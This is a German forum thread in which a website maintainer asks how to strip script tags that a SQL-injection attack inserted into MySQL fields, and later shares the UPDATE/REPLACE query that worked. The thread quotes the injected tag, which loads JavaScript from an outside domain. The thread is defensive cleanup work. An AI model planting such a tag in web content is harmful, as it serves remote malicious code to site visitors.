Bestimmte Zeichenkette aus mysql-db-feldern entfernen

bastooo

Neuer Benutzer
Beiträge
3
Hallo liebe sql-Checker!

ich hab die Suchfunktion genutzt aber noch nicht wirklich was in Richtung meines Problemes gefunden. Ich habe keine richtigen sql-Kenntnisse, betreue aber noch eine Webseite.

Gibt es einen SQL-Befehl bei dem man bestimmte Zeichen (zB <script src="..." etc) aus allen DB-Zeilen löschen kann bei denen diese in einem Feld stehn? Ja wir hatten einen Hack mit sql-injection aber keine saubere, aktuelle Sicherung. Wir haben auch nicht die Ressourcen neu aufzusetzen.

Wäre übergücklich wenn mir jemand helfen könnte und ich nicht alle Zeile händisch durchgehen müsste..
Freue mich natürlich auch über einen passenden Post wenn schon vorhanden!

Danke und schönen Abend :)
 

Anhänge

  • hack-db-screen.jpg
    hack-db-screen.jpg
    41,4 KB · Aufrufe: 2
Werbung:
Danke für die schnelle Antwort!!

Kannst du mir vielleicht sagen, wie ich diesen String, maskieren/eingeben muss, damit das mit Syntax hinhaut?

<script src='https://hotopponents.site/site.js?tp=2' type='text/javascript'></script>

Habs grad mit Backlsash probiert, aber ohne Erfolg - muss ich alle Sonderzeichen mit \ maskieren?

LG
 
Werbung:
Habs hinbekommen mit

UPDATE tabelle
SET feld = REPLACE(feld, '<script src=\'###\' type=\'text/javascript\'></script>', '')

Danke für den Hinweis nochmal!
 
Zurück
Oben